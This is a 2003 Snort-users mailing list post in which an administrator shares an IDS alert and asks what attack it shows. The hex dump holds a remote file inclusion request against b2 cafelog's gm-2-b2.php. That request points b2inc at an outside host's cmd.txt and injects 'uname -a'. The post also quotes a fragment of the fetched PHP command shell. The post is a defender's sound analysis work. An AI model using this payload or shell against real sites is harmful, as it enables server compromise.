Snort mailing list archives
Is it an real attack ?
From: Roberto Samarone Araújo (RSA) <sama () inf ufsc br>
Date: Mon, 29 Dec 2003 04:07:57 -0800
Hi, Verifying the snort logs, I found the following attack: [nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt 000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67 GET //b2-tools/g 010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63 m-2-b2.php?b2inc 020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E =http://www.corn 030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63 age.hpg.com.br/c 040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61 md.txt??&cmd=una 050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61 me%20-a?&cmd=una 060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58 me%20-a;echo%20X 070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A FTEAM HTTP/1.0.. 080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A HOST: mysite.com- 090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A mysite.com .... I entered on the site: http://www.cornage.hpg.com.br/cmd.txt and I found the following code: -cmd /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); $output = str_replace("\n","\n-cmd ",$output); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> What kind of attack is this ? Are there any place where can I find informations about this attack ? Thanks, Robert ------------------------------------------------------- This SF.net email is sponsored by: IBM Linux Tutorials. Become an expert in LINUX or just sharpen your skills. Sign up for IBM's Free Linux Tutorials. Learn everything from the bash shell to sys admin. Click now! http://ads.osdn.com/?ad_id=1278&alloc_id=3371&op=click _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Is it an real attack ? RSA (Dec 29)
- <Possible follow-ups>
- Re: Is it an real attack ? Nigel Houghton (Dec 29)